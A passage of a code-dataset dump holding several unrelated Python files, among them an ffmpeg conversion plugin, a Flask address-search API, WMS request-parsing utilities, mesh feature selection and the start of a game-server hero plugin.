Exception(\"Unsupported extension: %s\" % ext)\n \n result = os.popen(cmd)\n# for i in result.readlines():\n# print \"result: \", i\n return outputFile\n\n def __ffmpegAvailableCheck(self):\n \"\"\" check if ffmpeg is install locally\n @rtype: boolean\n @return: true if lame is installed locally\n \"\"\"\n result = os.popen(\"ffmpeg -version\")\n for line in result.readlines():\n if line.startswith(\"FFmpeg\"):\n return True \n return False\n","sub_path":"apps/ice/plugins/converters/plugin_mediaToFlv.py","file_name":"plugin_mediaToFlv.py","file_ext":"py","file_size_in_byte":6847,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"137498449","text":"import json\nimport re\n\nfrom flask import Blueprint, current_app, g, Response\n\nfrom search_api import config\nfrom search_api.exceptions import ApplicationError\nfrom search_api.utilities.V2_0 import address_response_mapper_v_2\nfrom flask.globals import request\n\naddresses_V_2 = Blueprint('addresses_V_2', __name__, url_prefix='/v2.0/search/addresses')\n\nbody = {\n \"datasource\": \"local_authority\",\n \"search_type\": \"\",\n \"query_value\": \"\",\n \"response_srid\": \"EPSG:27700\",\n \"max_results\": 1000\n}\npostcode_regex_check = '^([Gg][Ii][Rr] 0[Aa]{2})|((([A-Za-z][0-9]{1,2})|(([A-Za-z][A-Ha-hJ-Yj-y][0-9]{1,2})' \\\n '|(([A-Za-z][0-9][A-Za-z])|([A-Za-z][A-Ha-hJ-Yj-y][0-9]?[A-Za-z])))) [0-9][A-Za-z]{2})$'\n\nuprn_regex_check = '^[0-9]{6,12}$'\nusrn_regex_check = '^\\d+$'\n\n\n@addresses_V_2.route('/postcode/', methods=['GET'])\ndef get_addresses_by_postcode(postcode):\n current_app.logger.info(\"Get address by postcode '%s'\", postcode)\n postcode = postcode.strip()\n postcode_is_valid = re.match(postcode_regex_check, postcode)\n\n if postcode_is_valid is not None:\n body[\"search_type\"] = \"postcode\"\n body[\"query_value\"] = postcode\n return search_for_addresses(body)\n else:\n raise ApplicationError(\"Unprocessable Entity: Postcode is not valid\", 422, 422)\n\n\n@addresses_V_2.route('/uprn/', methods=['GET'])\ndef get_addresses_by_uprn(uprn):\n current_app.logger.info(\"Get address by UPRN '%s'\", uprn)\n uprn = uprn.strip()\n uprn_is_valid = re.match(uprn_regex_check, uprn)\n\n if uprn_is_valid is not None:\n body[\"search_type\"] = \"uprn\"\n body[\"query_value\"] = int(uprn)\n return search_for_addresses(body)\n else:\n raise ApplicationError(\"Unprocessable Entity: UPRN is not valid\", 422, 422)\n\n\n@addresses_V_2.route('/usrn/', methods=['GET'])\ndef get_addresses_by_usrn(usrn):\n current_app.logger.info(\"Get address by USRN '%s'\", usrn)\n usrn = usrn.strip()\n usrn_is_valid = re.match(usrn_regex_check, usrn)\n\n if usrn_is_valid is not None:\n body[\"search_type\"] = \"usrn\"\n body[\"query_value\"] = int(usrn)\n return search_for_addresses(body)\n else:\n raise ApplicationError(\"Unprocessable Entity: USRN is not valid\", 422, 422)\n\n\n@addresses_V_2.route('/text/', methods=['GET'])\ndef get_addresses_by_text(text):\n current_app.logger.info(\"Get address by text '%s'\", text)\n text = text.strip()\n\n body[\"search_type\"] = \"text_search\"\n body[\"query_value\"] = text\n\n return search_for_addresses(body)\n\n\ndef search_for_addresses(request_body):\n current_app.logger.info(\"Performing address search\")\n search_results = g.requests.post(config.ADDRESS_API_URL + '/v2/addresses/search',\n data=json.dumps(request_body, sort_keys=True),\n headers={\"Content-Type\": \"application/json\", \"Accept\": \"application/json\"})\n if search_results.status_code == 400:\n raise ApplicationError(search_results.json(), 400, 400)\n if search_results.status_code != 200:\n raise ApplicationError(search_results.json(), 500, 500)\n if not search_results.json():\n current_app.logger.warning(\"No addresses found for search\")\n raise ApplicationError(\"No addresses found for search.\", 404, 404)\n\n mapped_resp = address_response_mapper_v_2.map_address_response(search_results.json())\n\n # If index_map argument set to true, get index map for all the addresses\n if request.args.get('index_map') and request.args.get('index_map').lower() == 'true' and config.INDEX_MAP_API_URL:\n for address in mapped_resp:\n if 'uprn' in address and address['uprn']:\n index_map = search_for_index_map(address['uprn'])\n if index_map:\n address['index_map'] = index_map\n\n current_app.logger.info(\"Returning address search result\")\n return Response(\n response=json.dumps(mapped_resp),\n status=200,\n mimetype=\"application/json\"\n )\n\n\ndef search_for_index_map(uprn):\n current_app.logger.info(\"Performing uprn title search\")\n\n title_resp = g.requests.get('{}/v1/uprns/{}'.format(config.INDEX_MAP_API_URL, uprn),\n headers={\"Content-Type\": \"application/json\", \"Accept\": \"application/json\"})\n if title_resp.status_code == 200:\n features = []\n for title in title_resp.json():\n current_app.logger.info(\"Performing index map search\")\n index_map_resp = g.requests.get(\n '{}/v1/index_map/{}'.format(config.INDEX_MAP_API_URL, title),\n headers={\"Content-Type\": \"application/json\", \"Accept\": \"application/json\"})\n if index_map_resp.status_code == 200:\n index_map_json = index_map_resp.json()\n features = features + index_map_json['features']\n elif index_map_resp.status_code != 404:\n raise ApplicationError(index_map_resp.json(), 500, 500)\n if features:\n return {\"type\": \"FeatureCollection\",\n \"features\": features}\n elif title_resp.status_code != 404:\n raise ApplicationError(title_resp.json(), 500, 500)\n\n return None\n","sub_path":"search_api/resources/V2_0/addresses_v_2.py","file_name":"addresses_v_2.py","file_ext":"py","file_size_in_byte":5243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"606135644","text":"import csv\n\ndef read_file(path):\n with open(path, 'r') as file_to_read:\n data = file_to_read.read()\n return data\ndef Abrir_Archivo():\n data = open('practica4.csv',encoding = 'utf-8')\n csv_data = csv.reader(data)\n return list(csv_data)\n\ndef Sacar_Correos_Calif(lista):\n email = []\n _lista = lista\n for line in _lista[1:]:\n email.append(line[1]+' '+line[2])\n return email\n\ndef Sort_Correos_Calif(lista):\n slista = []\n _lista = lista\n arroba = 0\n for i in range(len(_lista)):\n arroba = _lista[i].find(\"@\")\n slista.append(_lista[i][(arroba+1):].split())\n slista.sort()\n return slista \n\ndef Promedio(lista):\n _lista = lista\n dprom = {}\n calif = int(_lista[0][1])\n count = 1\n prom = 0 \n for i in range((len(_lista)-1)):\n if _lista[i+1][0] == _lista[i][0]:\n count += 1\n calif += int(_lista[(i+1)][1])\n else:\n if(_lista.index(_lista[i+1])+1 == len(_lista)):\n dprom[_lista[i+1][0]] = int(_lista[(i+1)][1])\n prom = calif/count\n calif = int(_lista[(i+1)][1])\n count = 1\n dprom[_lista[i][0]] = prom\n return dprom \n\nlista = Abrir_Archivo()\nclista = Sacar_Correos_Calif(lista)\nslista = Sort_Correos_Calif(clista)\ndprom = Promedio(slista)\nprint(dprom) ","sub_path":"ago-dic-2020/Jonathan ivan aguilar cedillo/practica 4/practica4.py","file_name":"practica4.py","file_ext":"py","file_size_in_byte":1341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"292839580","text":"from __future__ import absolute_import, division, print_function\n\ntry:\n import regex as re\nexcept ImportError:\n import re\n\nimport numpy\nimport xarray\nfrom datetime import datetime\nfrom dateutil.parser import parse\nfrom dateutil.relativedelta import relativedelta\nfrom pytz import utc\n\ntry:\n from rasterio.warp import Resampling\nexcept ImportError:\n from rasterio.warp import RESAMPLING as Resampling\n\nfrom affine import Affine\nfrom datacube.utils import geometry\nimport math\n\nfrom datacube_ows.ows_configuration import get_config\nfrom datacube_ows.ogc_utils import solar_date, create_geobox\nfrom datacube_ows.ogc_exceptions import WMSException\n\nRESAMPLING_METHODS = {\n 'nearest': Resampling.nearest,\n 'cubic': Resampling.cubic,\n 'bilinear': Resampling.bilinear,\n 'cubic_spline': Resampling.cubic_spline,\n 'lanczos': Resampling.lanczos,\n 'average': Resampling.average,\n}\n\n\ndef _bounding_pts(minx, miny, maxx, maxy, width, height, src_crs, dst_crs=None):\n # pylint: disable=too-many-locals\n p1 = geometry.point(minx, maxy, src_crs)\n p2 = geometry.point(minx, miny, src_crs)\n p3 = geometry.point(maxx, maxy, src_crs)\n p4 = geometry.point(maxx, miny, src_crs)\n\n conv = dst_crs is not None\n gp1 = p1.to_crs(dst_crs) if conv else p1\n gp2 = p2.to_crs(dst_crs) if conv else p2\n gp3 = p3.to_crs(dst_crs) if conv else p3\n gp4 = p4.to_crs(dst_crs) if conv else p4\n\n minx = min(gp1.points[0][0], gp2.points[0][0], gp3.points[0][0], gp4.points[0][0])\n maxx = max(gp1.points[0][0], gp2.points[0][0], gp3.points[0][0], gp4.points[0][0])\n miny = min(gp1.points[0][1], gp2.points[0][1], gp3.points[0][1], gp4.points[0][1])\n maxy = max(gp1.points[0][1], gp2.points[0][1], gp3.points[0][1], gp4.points[0][1])\n\n # miny-maxy for negative scale factor and maxy in the translation, includes inversion of Y axis.\n\n return minx, miny, maxx, maxy\n\n\ndef _get_geobox_xy(args, crs):\n if get_config().published_CRSs[str(crs)][\"vertical_coord_first\"]:\n miny, minx, maxy, maxx = map(float, args['bbox'].split(','))\n else:\n minx, miny, maxx, maxy = map(float, args['bbox'].split(','))\n return minx, miny, maxx, maxy\n\n\ndef _get_geobox(args, src_crs, dst_crs=None):\n width = int(args['width'])\n height = int(args['height'])\n minx, miny, maxx, maxy = _get_geobox_xy(args, src_crs)\n\n if minx == maxx or miny == maxy:\n raise WMSException(\"Bounding box must enclose a non-zero area\")\n if dst_crs is not None:\n minx, miny, maxx, maxy = _bounding_pts(\n minx, miny,\n maxx, maxy,\n width, height,\n src_crs, dst_crs=dst_crs\n )\n\n out_crs = src_crs if dst_crs is None else dst_crs\n return create_geobox(\n out_crs,\n minx, miny, maxx, maxy,\n width, height\n )\n\n\ndef _get_polygon(args, crs):\n minx, miny, maxx, maxy = _get_geobox_xy(args, crs)\n poly = geometry.polygon([(minx, maxy), (minx, miny), (maxx, miny), (maxx, maxy), (minx, maxy)], crs)\n return poly\n\n\ndef int_trim(val, minval, maxval):\n return max(min(val, maxval), minval)\n\n\ndef zoom_factor(args, crs):\n # Determine the geographic \"zoom factor\" for the request.\n # (Larger zoom factor means deeper zoom. Smaller zoom factor means larger area.)\n # Extract request bbox and crs\n width = int(args['width'])\n height = int(args['height'])\n minx, miny, maxx, maxy = _get_geobox_xy(args, crs)\n\n # Project to a geographic coordinate system\n # This is why we can't just use the regular geobox. The scale needs to be\n # \"standardised\" in some sense, not dependent on the CRS of the request.\n geo_crs = geometry.CRS(\"EPSG:4326\")\n minx, miny, maxx, maxy = _bounding_pts(\n minx, miny,\n maxx, maxy,\n width, height,\n crs, dst_crs=geo_crs\n )\n # Create geobox affine transformation (N.B. Don't need an actual Geobox)\n affine = Affine.translation(minx, miny) * Affine.scale((maxx - minx) / width, (maxy - miny) / height)\n # Zoom factor is the reciprocal of the square root of the transform determinant\n # (The determinant is x scale factor multiplied by the y scale factor)\n return 1.0 / math.sqrt(affine.determinant)\n\n\ndef img_coords_to_geopoint(geobox, i, j):\n cfg = get_config()\n h_coord = cfg.published_CRSs[str(geobox.crs)][\"horizontal_coord\"]\n v_coord = cfg.published_CRSs[str(geobox.crs)][\"vertical_coord\"]\n return geometry.point(geobox.coordinates[h_coord].values[int(i)],\n geobox.coordinates[v_coord].values[int(j)],\n geobox.crs)\n\n\ndef get_product_from_arg(args, argname=\"layers\"):\n layers = args.get(argname, \"\").split(\",\")\n if len(layers) != 1:\n raise WMSException(\"Multi-layer requests not supported\")\n layer = layers[0]\n layer_chunks = layer.split(\"__\")\n layer = layer_chunks[0]\n cfg = get_config()\n product = cfg.product_index.get(layer)\n if not product:\n raise WMSException(\"Layer %s is not defined\" % layer,\n WMSException.LAYER_NOT_DEFINED,\n locator=\"Layer parameter\",\n valid_keys=list(cfg.product_index))\n return product\n\n\ndef get_arg(args, argname, verbose_name, lower=False,\n errcode=None, permitted_values=None):\n fmt = args.get(argname, \"\")\n if lower:\n fmt = fmt.lower()\n if not fmt:\n raise WMSException(\"No %s specified\" % verbose_name,\n errcode,\n locator=\"%s parameter\" % argname,\n valid_keys=permitted_values)\n\n if permitted_values:\n if fmt not in permitted_values:\n raise WMSException(\"%s %s is not supported\" % (verbose_name, fmt),\n errcode,\n locator=\"%s parameter\" % argname,\n valid_keys=permitted_values)\n return fmt\n\n\ndef get_times_for_product(product):\n ranges = product.ranges\n return ranges['times']\n\n\ndef get_times(args, product):\n # Time parameter\n times_raw = args.get('time', '')\n times = times_raw.split(',')\n\n return list([parse_time_item(item, product) for item in times])\n\n\ndef parse_time_item(item, product):\n times = item.split('/')\n # Time range handling follows the implementation described by GeoServer\n # https://docs.geoserver.org/stable/en/user/services/wms/time.html\n\n # If all times are equal we can proceed\n if len(times) > 1:\n start, end = parse_wms_time_strings(times)\n start, end = start.date(), end.date()\n matching_times = [t for t in product.ranges['times'] if start <= t <= end]\n if matching_times:\n # default to the first matching time\n return matching_times[0]\n else:\n raise WMSException(\n \"Time dimension range '%s'-'%s' not valid for this layer\" % (start, end),\n WMSException.INVALID_DIMENSION_VALUE,\n locator=\"Time parameter\")\n elif not times[0]:\n # default to last available time if not supplied.\n product_times = get_times_for_product(product)\n return product_times[-1]\n try:\n time = parse(times[0]).date()\n except ValueError:\n raise WMSException(\n \"Time dimension value '%s' not valid for this layer\" % times[0],\n WMSException.INVALID_DIMENSION_VALUE,\n locator=\"Time parameter\")\n\n # Validate time parameter for requested layer.\n if time not in product.ranges[\"time_set\"]:\n raise WMSException(\n \"Time dimension value '%s' not valid for this layer\" % times[0],\n WMSException.INVALID_DIMENSION_VALUE,\n locator=\"Time parameter\")\n return time\n\n\ndef parse_time_delta(delta_str):\n pattern = (r'P((?P\\d+)Y)?((?P\\d+)M)?((?P\\d+)D)?'\n r'(T(((?P\\d+)H)?((?P\\d+)M)?((?P\\d+)S)?)?)?')\n parts = re.search(pattern, delta_str).groupdict()\n return relativedelta(**{k: float(v) for k, v in parts.items() if v is not None})\n\n\ndef parse_wms_time_string(t, start=True):\n if t.upper() == 'PRESENT':\n return datetime.utcnow()\n elif t.startswith('P'):\n return parse_time_delta(t)\n else:\n default = datetime(1970, 1, 1) if start else datetime(1970, 12, 31, 23, 23, 59, 999999) # default year ignored\n return parse(t, default=default)\n\n\ndef parse_wms_time_strings(parts):\n start = parse_wms_time_string(parts[0])\n end = parse_wms_time_string(parts[-1], start=False)\n\n a_tiny_bit = relativedelta(microseconds=1)\n # Follows GeoServer https://docs.geoserver.org/stable/en/user/services/wms/time.html#reduced-accuracy-times\n\n if isinstance(start, relativedelta):\n if isinstance(end, relativedelta):\n raise WMSException(\n \"Could not understand time value '%s'\" %parts,\n WMSException.INVALID_DIMENSION_VALUE,\n locator=\"Time parameter\")\n fuzzy_end=parse_wms_time_string(parts[-1], start=True)\n return fuzzy_end - start + a_tiny_bit, end\n if isinstance(end, relativedelta):\n return start, start + end - a_tiny_bit\n return start, end\n\n\ndef bounding_box_to_geom(bbox, bb_crs, target_crs):\n poly = geometry.polygon([\n (bbox.left, bbox.top),\n (bbox.left, bbox.bottom),\n (bbox.right, bbox.bottom),\n (bbox.right, bbox.top),\n (bbox.left, bbox.top),\n ], bb_crs)\n return poly.to_crs(target_crs)\n\n\nclass GetParameters():\n def __init__(self, args):\n self.cfg = get_config()\n # Version\n self.version = get_arg(args, \"version\", \"WMS version\",\n permitted_values=['1.1.1', '1.3.0'])\n # CRS\n if self.version == '1.1.1':\n crs_arg = \"srs\"\n else:\n crs_arg = \"crs\"\n self.crsid = get_arg(args, crs_arg, \"Coordinate Reference System\",\n errcode=WMSException.INVALID_CRS,\n permitted_values=list(self.cfg.published_CRSs))\n self.crs = self.cfg.crs(self.crsid)\n # Layers\n self.product = self.get_product(args)\n\n self.geometry = _get_polygon(args, self.crs)\n # BBox, height and width parameters\n self.geobox = _get_geobox(args, self.crs)\n # Time parameter\n self.times = get_times(args, self.product)\n\n self.method_specific_init(args)\n\n def method_specific_init(self, args):\n pass\n\n def get_product(self, args):\n return get_product_from_arg(args)\n\n\nclass GetLegendGraphicParameters():\n def __init__(self, args):\n self.product = get_product_from_arg(args, 'layer')\n\n # Validate Format parameter\n self.format = get_arg(args, \"format\", \"image format\",\n errcode=WMSException.INVALID_FORMAT,\n lower=True,\n permitted_values=[\"image/png\"])\n arg_styles = args.get(\"styles\", None)\n if arg_styles:\n # Styles\n try:\n self.styles = [\n self.product.style_index[style_name]\n for style_name in arg_styles.split(\",\")\n ]\n except KeyError as e:\n raise WMSException(\n f\"Style {e} not valid for layer.\",\n WMSException.STYLE_NOT_DEFINED,\n locator=\"STYLES parameter\"\n )\n else:\n self.styles = [self.product.default_style]\n # Time parameter\n self.times = get_times(args, self.product)\n\n\nclass GetMapParameters(GetParameters):\n def method_specific_init(self, args):\n # Validate Format parameter\n self.format = get_arg(args, \"format\", \"image format\",\n errcode=WMSException.INVALID_FORMAT,\n lower=True,\n permitted_values=[\"image/png\"])\n # Styles\n self.styles = args.get(\"styles\", \"\").split(\",\")\n if len(self.styles) != 1:\n raise WMSException(\"Multi-layer GetMap requests not supported\")\n style_r = self.styles[0]\n if not style_r:\n style_r = self.product.default_style.name\n self.style = self.product.style_index.get(style_r)\n if not self.style:\n raise WMSException(\"Style %s is not defined\" % style_r,\n WMSException.STYLE_NOT_DEFINED,\n locator=\"Style parameter\",\n valid_keys=list(self.product.style_index))\n cfg = get_config()\n if self.geobox.width > cfg.wms_max_width:\n raise WMSException(f\"Width {self.geobox.width} exceeds supported maximum {self.cfg.wms_max_width}.\",\n locator=\"Width parameter\")\n if self.geobox.height > cfg.wms_max_height:\n raise WMSException(f\"Width {self.geobox.height} exceeds supported maximum {self.cfg.wms_max_height}.\",\n locator=\"Height parameter\")\n\n # Zoom factor\n self.zf = zoom_factor(args, self.crs)\n\n self.ows_stats = bool(args.get(\"ows_stats\"))\n\n # TODO: Do we need to make resampling method configurable?\n self.resampling = Resampling.nearest\n\n\nclass GetFeatureInfoParameters(GetParameters):\n def get_product(self, args):\n return get_product_from_arg(args, \"query_layers\")\n\n def method_specific_init(self, args):\n # Validate Formata parameter\n self.format = get_arg(args, \"info_format\", \"info format\", lower=True,\n errcode=WMSException.INVALID_FORMAT,\n permitted_values=[\"application/json\"])\n # Point coords\n if self.version == \"1.1.1\":\n coords = [\"x\", \"y\"]\n else:\n coords = [\"i\", \"j\"]\n i = args.get(coords[0])\n j = args.get(coords[1])\n if i is None:\n raise WMSException(\"HorizontalCoordinate not supplied\", WMSException.INVALID_POINT,\n \"%s parameter\" % coords[0])\n if j is None:\n raise WMSException(\"Vertical coordinate not supplied\", WMSException.INVALID_POINT,\n \"%s parameter\" % coords[0])\n self.i = int(i)\n self.j = int(j)\n\n\n# Solar angle correction functions\ndef declination_rad(dt):\n # Estimate solar declination from a datetime. (value returned in radians).\n # Formula taken from https://en.wikipedia.org/wiki/Position_of_the_Sun#Declination_of_the_Sun_as_seen_from_Earth\n timedel = dt - datetime(dt.year, 1, 1, 0, 0, 0, tzinfo=utc)\n day_count = timedel.days + timedel.seconds / (60.0 * 60.0 * 24.0)\n return -1.0 * math.radians(23.44) * math.cos(2 * math.pi / 365 * (day_count + 10))\n\n\ndef cosine_of_solar_zenith(lat, lon, utc_dt):\n # Estimate cosine of solar zenith angle\n # (angle between sun and local zenith) at requested latitude, longitude and datetime.\n # Formula taken from https://en.wikipedia.org/wiki/Solar_zenith_angle\n utc_seconds_since_midnight = ((utc_dt.hour * 60) + utc_dt.minute) * 60 + utc_dt.second\n utc_hour_deg_angle = (utc_seconds_since_midnight / (60 * 60 * 24) * 360.0) - 180.0\n local_hour_deg_angle = utc_hour_deg_angle + lon\n local_hour_angle_rad = math.radians(local_hour_deg_angle)\n latitude_rad = math.radians(lat)\n solar_decl_rad = declination_rad(utc_dt)\n result = math.sin(latitude_rad) * math.sin(solar_decl_rad) \\\n + math.cos(latitude_rad) * math.cos(solar_decl_rad) * math.cos(local_hour_angle_rad)\n return result\n\n\ndef solar_correct_data(data, dataset):\n # Apply solar angle correction to the data for a dataset.\n # See for example http://gsp.humboldt.edu/olm_2015/Courses/GSP_216_Online/lesson4-1/radiometric.html\n native_x = (dataset.bounds.right + dataset.bounds.left) / 2.0\n native_y = (dataset.bounds.top + dataset.bounds.bottom) / 2.0\n pt = geometry.point(native_x, native_y, dataset.crs)\n crs_geo = geometry.CRS(\"EPSG:4326\")\n geo_pt = pt.to_crs(crs_geo)\n data_time = dataset.center_time.astimezone(utc)\n data_lon, data_lat = geo_pt.coords[0]\n\n csz = cosine_of_solar_zenith(data_lat, data_lon, data_time)\n\n return data / csz\n\n\ndef wofls_fuser(dest, src):\n where_nodata = (src & 1) == 0\n numpy.copyto(dest, src, where=where_nodata)\n return dest\n\n\ndef item_fuser(dest, src):\n where_combined = numpy.isnan(dest) | (dest == -6666.)\n numpy.copyto(dest, src, where=where_combined)\n return dest\n\n\ndef collapse_datasets_to_times(datasets, times, tz):\n available_dates = datasets.coords[\"time\"].values\n collapsed = []\n selected_dates = []\n for i, dt in enumerate(times):\n npdt = numpy.datetime64(dt)\n if npdt not in available_dates:\n # TODO: Improve efficiency for large available date sets!\n npdt = None\n for avnpdt in available_dates:\n av_dt = datetime.utcfromtimestamp(avnpdt.astype(int) * 1e-9)\n av_date = solar_date(av_dt, tz)\n if av_date == dt:\n npdt = avnpdt\n break\n if not npdt:\n continue\n selected_dates.append(npdt)\n dss = datasets.sel(time=npdt)\n dssv = dss.values\n collapsed.append(tuple(dssv.tolist()))\n\n nparray = numpy.empty(len(selected_dates), dtype=object)\n for i, dss in enumerate(collapsed):\n nparray[i] = dss\n return xarray.DataArray(\n nparray,\n dims=[\"time\"],\n coords=[selected_dates]\n )\n\n","sub_path":"datacube_ows/wms_utils.py","file_name":"wms_utils.py","file_ext":"py","file_size_in_byte":17693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"353716873","text":"def is_happy(num):\n seq = []\n while num != 1:\n num = sum(map(lambda x: x**2, map(int, str(num))))\n if num in seq:\n return False\n seq.append(num)\n return True\n\n\ndef happy_numbers():\n \"\"\"\n Generator which returns happy numbers.\n \"\"\"\n num = 0\n while True:\n num += 1\n if is_happy(num):\n yield num\n\n\ndef main():\n for i in happy_numbers():\n print(i)\n\n\nif __name__ == '__main__':\n main()","sub_path":"Numbers/happynumbers/happynumbers.py","file_name":"happynumbers.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"483442773","text":"from abc import ABCMeta, abstractclassmethod\nimport numpy\nimport trimesh\nclass FeatureSelectionStrategy(metaclass = ABCMeta):\n @abstractclassmethod\n def select_features(self):\n pass\n\n\n\nclass AveragePickUpVertices(FeatureSelectionStrategy): \n def __init__(self, mesh, quantity=40):\n self.mesh = mesh\n self.quantity = quantity\n self.vertices = None\n\n def select_features(self):\n selected_index = []\n iter_time = 0\n dtype = [('x', float), ('y', float), ('z', float)]\n vertices_seq = numpy.array([tuple(vertices) for vertices in self.mesh.vertices], dtype= dtype)\n vertices_seq = numpy.array([list(vertices) for vertices in numpy.sort(vertices_seq, order=['y', 'x', 'z'])])\n for index, point in enumerate(vertices_seq):\n if len(selected_index) >= self.quantity:\n break\n if self.__is_maintain_distance(point, vertices_seq[selected_index], 30): \n selected_index.append(index)\n \n #draw the points on mesh\n #print(\"length of selected: \", len(selected_index))\n self.__visual_selected_points(self.mesh, vertices_seq[selected_index])\n return vertices_seq[selected_index]\n \n #private\n def __count_distance(self, p1, p2):\n return numpy.power(numpy.sum(numpy.square(numpy.array(p1) - numpy.array(p2))), 0.5)\n\n def __is_maintain_distance(self, point, selected_points, distance):\n for selected_point in selected_points:\n if self.__count_distance(point, selected_point) < distance:\n return False\n return True\n\n \n def __visual_selected_points(self, mesh, selected_points, selected_color=[255,0,0,0],\n not_selected_color=[0,255,0,0]):\n for vertices in selected_points:\n index, j = numpy.where(mesh.vertices== vertices) \n mesh.visual.vertex_colors[index[0]] = selected_color\n \nclass OnlyPickNose(FeatureSelectionStrategy):\n def __init__(self, mesh, nose_index=100):\n self.mesh = mesh\n self.nose_index = nose_index\n\n def select_features(self):\n return [self.mesh.vertices[self.nose_index]]\n\n# def _find_point_in_witch_triangle(self, mesh, point):\n# for triangle in mesh.triangles:\n# part_triangle_1 = count_triangle_area([point, triangle[0], triangle[1]])\n# part_triangle_2 = count_triangle_area([point, triangle[1], triangle[2]])\n# part_triangle_3 = count_triangle_area([point, triangle[0], triangle[2]])\n# if triangle.area == (part_triangle_1 + part_triangle_2 + part_triangle_3):\n# return triangle\n# # return None\n# def count_triangle_area(self, vertices):\n# a = self.count_distance(vertices[0], vertices[1])\n# b = self.count_distance(vertices[0], vertices[2])\n# c = self.count_distance(vertices[1], vertices[2])\n# s = (a+b+c)/2\n# return pow(s*(s-a)*(s-b)*(s-c), 0.5)\n \n# def hog(self, mesh, mask_size=(2,2)):\n# x_min = mesh.vertices[np.argmin(mesh.vertices[:, 0])][0]\n# y_min = mesh.vertices[np.argmin(mesh.vertices[:, 1])][1]\n# x_max = mesh.vertices[np.argmax(mesh.vertices[:, 0])][0]\n# y_max = mesh.vertices[np.argmax(mesh.vertices[:, 1])][1]\n# print(\"x range:\", x_min, x_max, \"y range:\", y_min, y_max)\n# sampling_frequency = 1.0\n# for y in range(y_min, y_max, mask_size[1]):\n# for x in range(x_min, x_max, mask_size[0]):\n\n# class TestFeaturesSelector(unittest.TestCase):\n# @classmethod\n# def setUp(self):\n# self.selected_points = [[0, 7, 10], [2, 6, 10], [3, 4, 9]]\n# self.vertices = [[0, 0, 0], [2, 2, 4], [3, 3, 0], [4, 1, 4]]\n# self.FS = FeaturesSelector()\n \n# def test_count_distance(self):\n# self.assertAlmostEqual(self.FS.count_distance(self.vertices[0], self.vertices[1]), 4.8989, places=3)\n# self.assertAlmostEqual(self.FS.count_distance(self.vertices[0], self.vertices[2]), 4.2426, places=3)\n \n# def test_is_maintain_distance(self):\n# self.assertTrue(self.FS.is_maintain_distance(self.vertices[0], self.selected_points, 10))\n# self.assertFalse(self.FS.is_maintain_distance(self.vertices[1], self.selected_points, 10))\n# unittest.main(argv=[''], verbosity=2, exit=False)","sub_path":"feature_selection.py","file_name":"feature_selection.py","file_ext":"py","file_size_in_byte":4378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"546843397","text":"# ======================================================================\n# >> IMPORTS\n# ======================================================================\n\n# Hero-Wars\nfrom hw.database import save_player_data\nfrom hw.database import load_player_data\nfrom hw.database import save_hero_data\n\nfrom hw.entities import Hero\n\nfrom hw.tools import find_element\n\nfrom hw.configs import starting_heroes\nfrom hw.configs import player_entity_class\n\n# Source.Python\nfrom players.helpers import index_from_userid\n\nfrom memory import make_object\nfrom memory.hooks import HookType\n\nfrom entities import TakeDamageInfo\nfrom entities.helpers import index_from_pointer\n\nfrom events import Event\n\nfrom weapons.entity import WeaponEntity\n\nfrom engines.server import engine_server\n\n\n# ======================================================================\n# >> GLOBALS\n# ======================================================================\n\n_player_data = {}\n_is_hooked = False\n\n\n# ======================================================================\n# >> GAME EVENTS\n# ======================================================================\n\n@Event\ndef player_disconnect(game_event):\n \"\"\"Saves player's data upon disconnect.\"\"\"\n\n userid = game_event.get_int('userid')\n player = Player.from_userid(userid)\n save_player_data(player)\n del _player_data[userid]\n\n\n@Event\ndef player_spawn(game_event):\n \"\"\"Saves player's data upon spawning.\"\"\"\n\n player = Player.from_userid(game_event.get_int('userid'))\n save_player_data(player)\n\n\n# ======================================================================\n# >> HOOKS\n# ======================================================================\n\ndef _weapon_bump(args):\n \"\"\"\n Hooked to a function that is fired any time a weapon is\n requested to be picked up in game.\n \"\"\"\n\n player_index = index_from_pointer(args[0])\n weapon_index = index_from_pointer(args[1])\n weapon = WeaponEntity(weapon_index)\n player = Player(player_index)\n eargs = {'weapon': weapon, 'player': player}\n if weapon.classname in player.restrictions:\n player.hero.execute_skills('weapon_pickup_fail', **eargs)\n return False\n else:\n player.hero.execute_skills('weapon_pickup', **eargs)\n\n\ndef _on_take_damage(args):\n \"\"\"\n Hooked to a function that is fired any time an\n entity takes damage.\n \"\"\"\n\n player_index = index_from_pointer(args[0])\n info = make_object(TakeDamageInfo, args[1])\n defender = Player(player_index)\n attacker = None if not info.attacker else Player(info.attacker)\n eargs = {\n 'attacker': attacker,\n 'defender': defender,\n 'info': info\n }\n if not player_index == info.attacker:\n defender.hero.execute_skills('player_pre_defend', **eargs)\n attacker.hero.execute_skills('player_pre_attack', **eargs)\n\n\n# ======================================================================\n# >> CLASSES\n# ======================================================================\n\nclass Player(player_entity_class):\n \"\"\"Player class for Hero-Wars related activity and data.\n\n Attributes:\n gold: Player's Hero-Wars gold, used to purchase heroes and items\n hero: Player's hero currently in use\n heroes: List of owned heroes\n \"\"\"\n\n @classmethod\n def from_userid(cls, userid):\n \"\"\"Returns a Player instance from an userid.\n\n Args:\n userid: Userid of the player\n \"\"\"\n\n return cls(index_from_userid(userid))\n\n def __init__(self, index):\n \"\"\"Initializes a new player instance.\n\n Args:\n index: Index of the player\n \"\"\"\n\n super().__init__(index)\n\n # Create player's data dict\n if self.userid not in _player_data:\n _player_data[self.userid] = {\n 'gold': 0,\n 'hero': None,\n 'heroes': [],\n 'restrictions': set()\n }\n\n # Load player's data\n load_player_data(self)\n\n # Make sure the player gets his starting heroes\n heroes = Hero.get_subclasses()\n for cid in starting_heroes:\n hero_cls = find_element(heroes, 'cid', cid)\n if hero_cls and not find_element(self.heroes, 'cid', cid):\n self.heroes.append(hero_cls())\n\n # Make sure the player has a hero\n if not self.hero:\n self.hero = self.heroes[0]\n\n # Hooks :3\n global _is_hooked\n if _is_hooked is False:\n self.bump_weapon.add_hook(HookType.PRE, _weapon_bump)\n 